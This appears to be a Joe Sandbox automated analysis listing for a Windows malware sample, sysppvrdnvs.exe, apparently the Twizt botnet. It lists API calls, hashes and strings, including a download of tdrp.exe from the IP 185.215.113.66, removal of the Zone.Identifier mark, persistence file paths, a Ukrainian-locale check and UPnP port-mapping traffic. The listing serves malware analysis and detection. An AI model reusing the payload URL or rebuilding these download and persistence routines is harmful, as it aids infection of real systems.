                                                                                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                    • API String ID: 2666887985-3471754645
                                                                                                                                    • Opcode ID: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                    • Instruction ID: 87cba227ccd7b938b07588cb79f30f32aa16a0fd6c84a7572e83495dfcaef010
                                                                                                                                    • Opcode Fuzzy Hash: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                    • Instruction Fuzzy Hash: D311FCB0E0020A9BDB10CFD0D945BEEBBB4BB08304F118119E615B7280D7B85685CF99
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                      • Part of subcall function 0040DCD0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
                                                                                                                                      • Part of subcall function 0040DCD0: CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2251373460-0
                                                                                                                                    • Opcode ID: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                    • Instruction ID: 271f69a92097b1b74c70525479ef463fb32d1143369d808ec26f6a45d53993ac
                                                                                                                                    • Opcode Fuzzy Hash: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                    • Instruction Fuzzy Hash: 8D31FA74A00208EFDB04DF98D889B9E7BB5EF48314F0085A8E906A7391D774EA95CF94
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep$CountTickrandsrand
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3488799664-0
                                                                                                                                    • Opcode ID: 95932355324cd33d74b870fd3c13360e694d795896d581ce62ec288b395a73ba
                                                                                                                                    • Instruction ID: d526f444081091d18ff5343ef40ffd9a09f2c1e6f6858c3ecb06089bc02b22b2
                                                                                                                                    • Opcode Fuzzy Hash: 95932355324cd33d74b870fd3c13360e694d795896d581ce62ec288b395a73ba
                                                                                                                                    • Instruction Fuzzy Hash: 1F21A479E00208FBC704DF60D885AAE7B31AB45304F10C47AE9026B381D679BA80CB56
                                                                                                                                    APIs
                                                                                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                                    • htons.WS2_32(?), ref: 00401281
                                                                                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                    • String ID: pdu
                                                                                                                                    • API String ID: 2164660128-2320407122
                                                                                                                                    • Opcode ID: b069b6341f395dab984beb8928ef2dc1d0a12e44db74397201ebfa712d18ea75
                                                                                                                                    • Instruction ID: 05dd75d8116292c76d11c3cc90d45d23dbf78b8bb9632d9a28891a4d74dcab7a
                                                                                                                                    • Opcode Fuzzy Hash: b069b6341f395dab984beb8928ef2dc1d0a12e44db74397201ebfa712d18ea75
                                                                                                                                    • Instruction Fuzzy Hash: 0731B3762083009BC710DF69D880A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                                                                    APIs
                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,004083D7), ref: 00407398
                                                                                                                                    • SysAllocString.OLEAUT32(C:\Windows\sysppvrdnvs.exe), ref: 004073A3
                                                                                                                                    • CoUninitialize.OLE32 ref: 004073C8
                                                                                                                                      • Part of subcall function 004073E0: SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 004073C2
                                                                                                                                    Strings
                                                                                                                                    • C:\Windows\sysppvrdnvs.exe, xrefs: 0040739E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                    • String ID: C:\Windows\sysppvrdnvs.exe
                                                                                                                                    • API String ID: 459949847-2879333202
                                                                                                                                    • Opcode ID: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                    • Instruction ID: 94d3ecd3e534f0c2973a063d63be5db40503c7f445082467247c405133df6831
                                                                                                                                    • Opcode Fuzzy Hash: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                    • Instruction Fuzzy Hash: FEE01275944208FBD7049FA0ED0EB9D77649B04341F1041A5FD05A22A1DAF56E80D755
                                                                                                                                    APIs
                                                                                                                                    • ioctlsocket.WS2_32 ref: 0040112B
                                                                                                                                    • recvfrom.WS2_32 ref: 0040119C
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3980219359-0
                                                                                                                                    • Opcode ID: e871f297b8ec647587383603dc2ce7d0bb970bcccd2ecc260039be8e6d46355a
                                                                                                                                    • Instruction ID: daf299aa3b87b71fb70ff151311bbfa052327c8c190f043936f27822c7d74034
                                                                                                                                    • Opcode Fuzzy Hash: e871f297b8ec647587383603dc2ce7d0bb970bcccd2ecc260039be8e6d46355a
                                                                                                                                    • Instruction Fuzzy Hash: 1621C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF559A6290E774D94887EA
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00407670: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFreeInstanceString
                                                                                                                                    • String ID: Microsoft Corporation
APIs
• CoInitializeEx.COMBASE(00000000,00000002,?,?,?,004083D2), ref: 0040E0CA
  • Part of subcall function 0040E190: socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
  • Part of subcall function 0040E190: htons.WS2_32(0000076C), ref: 0040E1E0
  • Part of subcall function 0040E190: inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
  • Part of subcall function 0040E190: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
  • Part of subcall function 0040E190: bind.WS2_32(000000FF,?,00000010), ref: 0040E243
  • Part of subcall function 0040E190: lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
  • Part of subcall function 0040E190: sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
  • Part of subcall function 0040E190: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
  • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
  • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
• API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
• String ID: TCP$UDP
APIs
• EnterCriticalSection.KERNEL32(00415B88,?,00000000,?), ref: 00405EFF
• memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F3E
• memcpy.NTDLL(00000000,00000000,00000100), ref: 00405FB3
• LeaveCriticalSection.KERNEL32(00415B88), ref: 00405FD0
• API ID: CriticalSectionmemcpy$EnterLeave
• String ID:
APIs
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D55C
• InterlockedIncrement.KERNEL32(000000FF), ref: 0040D591
• InterlockedDecrement.KERNEL32(000000FF), ref: 0040D694
• API ID: Interlocked$DecrementExchangeIncrement
• String ID:
APIs
• lstrlenA.KERNEL32(Twizt,?,?,?,?,8@,00000000,8@,0040E038,00000000,00000000), ref: 0040BE7C
• API ID: lstrlen
• String ID: Twizt$Twizt
APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 0040D853
• htons.WS2_32(00009E34), ref: 0040D885
• connect.WS2_32(000000FF,?,00000010), ref: 0040D89F
  • Part of subcall function 0040B4F0: shutdown.WS2_32(0040B4DD,00000002), ref: 0040B4F9
  • Part of subcall function 0040B4F0: closesocket.WS2_32(0040B4DD), ref: 0040B503
• API ID: closesocketconnecthtonsshutdownsocket
• String ID:
APIs
• memcpy.NTDLL(00000000,?,?), ref: 004076E8
• CreateThread.KERNEL32(00000000,00000000,00407720,00000000,00000000,00000000), ref: 0040770A
• CloseHandle.KERNEL32(00000000), ref: 00407711
• API ID: CloseCreateHandleThreadmemcpy
• String ID:
APIs
  • Part of subcall function 0040A800: GetCurrentProcessId.KERNEL32(?,0040A76B,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A803
• HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,0040A777,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A84C
• HeapSetInformation.KERNEL32(02DE0000,00000000,00000002,00000004), ref: 0040A876
• GetCurrentProcessId.KERNEL32 ref: 0040A87C
  • Part of subcall function 0040A890: GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A8AC
• API ID: Process$CurrentHeap$CreateHeapsInformation
• String ID:
APIs
• CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
• GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
• CloseHandle.KERNEL32(000000FF), ref: 0040F232
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Similarity
• API ID: File$CloseCreateHandleSize
APIs
  • Part of subcall function 0040A800: GetCurrentProcessId.KERNEL32(?,0040A76B,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A803
• RtlAllocateHeap.NTDLL(02DE0000,?,-0000000C), ref: 0040A7AA
• memset.NTDLL ref: 0040A7E4
  • Part of subcall function 0040A820: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,0040A777,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A84C
  • Part of subcall function 0040A820: HeapSetInformation.KERNEL32(02DE0000,00000000,00000002,00000004), ref: 0040A876
  • Part of subcall function 0040A820: GetCurrentProcessId.KERNEL32 ref: 0040A87C
Similarity
• API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
APIs
  • Part of subcall function 004013B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
  • Part of subcall function 004013B0: socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
  • Part of subcall function 004013B0: bind.WS2_32(?,?,00000010), ref: 00401429
  • Part of subcall function 0040BBB0: EnterCriticalSection.KERNEL32(004165F8), ref: 0040BBC0
  • Part of subcall function 0040BBB0: LeaveCriticalSection.KERNEL32(004165F8), ref: 0040BBEC
• InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040DFFD
• WaitForSingleObject.KERNEL32(000006BC,00001388), ref: 0040E047
Similarity
• API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
APIs
• gethostname.WS2_32(?,00000100), ref: 0040B79C
• gethostbyname.WS2_32(?), ref: 0040B7AE
Similarity
• API ID: gethostbynamegethostname
APIs
Similarity
• API ID: gethostbynameinet_addr
APIs
• shutdown.WS2_32(0040B4DD,00000002), ref: 0040B4F9
• closesocket.WS2_32(0040B4DD), ref: 0040B503
Similarity
• API ID: closesocketshutdown
APIs
• EnterCriticalSection.KERNEL32(004165F8), ref: 0040BBC0
• LeaveCriticalSection.KERNEL32(004165F8), ref: 0040BBEC
Similarity
• API ID: CriticalSection$EnterLeave
APIs
• EnterCriticalSection.KERNEL32(004165F8,?,0040BDA7), ref: 0040B518
• LeaveCriticalSection.KERNEL32(004165F8,?,0040BDA7), ref: 0040B528
Similarity
• API ID: CriticalSection$EnterLeave
APIs
• __aligned_recalloc_base.LIBCMTD ref: 0040CD67
APIs
  • Part of subcall function 0040A800: GetCurrentProcessId.KERNEL32(?,0040A76B,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A803
• RtlFreeHeap.NTDLL(02DE0000,00000000,00402612,?,00402612,?), ref: 0040ABBB
APIs
• send.WS2_32(00000000,00000000,?,00000000), ref: 0040D72F
APIs
  • Part of subcall function 0040BBB0: EnterCriticalSection.KERNEL32(004165F8), ref: 0040BBC0
  • Part of subcall function 0040BBB0: LeaveCriticalSection.KERNEL32(004165F8), ref: 0040BBEC
• WaitForSingleObject.KERNEL32(000006BC,00001388), ref: 0040D95C
  • Part of subcall function 0040D550: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D55C
APIs
• CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690
APIs
• memcpy.NTDLL(00000000,?,004024FF), ref: 004025F1
APIs
• API ID: memset
APIs
• memcpy.NTDLL(?,?,00000100,?,?,?,00000000), ref: 00405D8C
  • Part of subcall function 004076C0: memcpy.NTDLL(00000000,?,?), ref: 004076E8
  • Part of subcall function 004076C0: CreateThread.KERNEL32(00000000,00000000,00407720,00000000,00000000,00000000), ref: 0040770A
  • Part of subcall function 004076C0: CloseHandle.KERNEL32(00000000), ref: 00407711
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Similarity
• API ID: memcpy$CloseCreateHandleThread
• API String ID: 241592544-0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Similarity
• API ID: memcmp
• API String ID: 1475443563-0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Similarity
• API ID: File$wsprintf$ExistsPath$AttributesDelete$CreateDirectory_chkstk
• String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\rvlcfg.exe$%s\%s\rvldrv.exe$%s\*$C:\Windows\sysppvrdnvs.exe$shell32.dll$shell32.dll$shell32.dll$shell32.dll
• API String ID: 495142193-2225385857
                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryW.KERNEL32(00406F1A,00000000), ref: 004067AF
                                                                                                                                    • wsprintfW.USER32 ref: 004067C5
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004067DC
                                                                                                                                    • lstrcmpW.KERNEL32(?,00411368), ref: 00406801
                                                                                                                                    • lstrcmpW.KERNEL32(?,0041136C), ref: 00406817
                                                                                                                                    • wsprintfW.USER32 ref: 0040683A
                                                                                                                                    • wsprintfW.USER32 ref: 0040685A
                                                                                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406896
                                                                                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 004068AA
                                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 004068BF
                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 004068C9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Similarity
• API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
• String ID: %s\%s$%s\%s$%s\*
• API String ID: 92872011-445461498
                                                                                                                                    APIs
                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407A28), ref: 0040F1C3
                                                                                                                                    • strcmp.NTDLL ref: 0040F1D2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Similarity
• API ID: InfoLocalestrcmp
• String ID: UKR
• API String ID: 3191669094-64918367
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 004064A9
                                                                                                                                    • srand.MSVCRT ref: 004064B0
                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004064D0
                                                                                                                                    • rand.MSVCRT ref: 004064D6
                                                                                                                                    • rand.MSVCRT ref: 004064EA
                                                                                                                                    • wsprintfW.USER32 ref: 0040650F
                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00406525
                                                                                                                                    • InternetOpenUrlW.WININET(00000000,http://185.215.113.66/tdrp.exe,00000000,00000000,00000000,00000000), ref: 00406552
                                                                                                                                    • CreateFileW.KERNEL32(00415BA8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040657F
                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 004065B2
                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 004065E3
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 004065F2
                                                                                                                                    • wsprintfW.USER32 ref: 00406609
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00406619
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040662D
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040663A
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00406647
                                                                                                                                    Strings
                                                                                                                                    • %temp%, xrefs: 004064CB
                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 00406520
                                                                                                                                    • %s:Zone.Identifier, xrefs: 004065FD
                                                                                                                                    • http://185.215.113.66/tdrp.exe, xrefs: 00406546
                                                                                                                                    • %s\%d%d.exe, xrefs: 00406505
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Similarity
• API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritesrand
• String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$http://185.215.113.66/tdrp.exe
• API String ID: 2816847299-853099633
APIs
• GetTickCount.KERNEL32 ref: 0040192C
• WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
• WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
• WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
• accept.WS2_32(?,?,?), ref: 004019A8
• GetTickCount.KERNEL32 ref: 004019F6
• EnterCriticalSection.KERNEL32(?), ref: 00401A09
• LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
• LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
• GetTickCount.KERNEL32 ref: 00401A43
• EnterCriticalSection.KERNEL32(?), ref: 00401A52
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
• LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
• GetTickCount.KERNEL32 ref: 00401AAB
• WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
Strings
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
• String ID: PCOI$ilci
• API String ID: 3345448188-3762367603
APIs
• memset.NTDLL ref: 0040EF98
• InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EFE8
• InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EFFB
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F034
• HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F06A
• HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040F095
